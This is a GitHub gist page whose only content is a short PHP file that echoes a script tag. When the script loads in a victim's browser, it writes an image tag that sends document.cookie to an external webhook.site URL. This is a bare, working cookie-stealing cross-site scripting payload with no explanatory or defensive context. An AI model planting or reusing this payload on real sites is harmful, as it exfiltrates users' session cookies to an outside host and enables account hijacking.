Skip to content

Instantly share code, notes, and snippets.

@olexandrch
Last active August 20, 2019 04:22
Show Gist options
  • Save olexandrch/95855d9f1f788ea4e10aa1b26e0df6f4 to your computer and use it in GitHub Desktop.
Save olexandrch/95855d9f1f788ea4e10aa1b26e0df6f4 to your computer and use it in GitHub Desktop.
<?php
$html = <<<EOF
<script>
document.write('<img src="https://webhook.site/b1302a34-bee4-493f-b3ed-06539ce82117?cookie='+(document.cookie||"none")+'" />');
</script>
EOF;
echo $html;
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment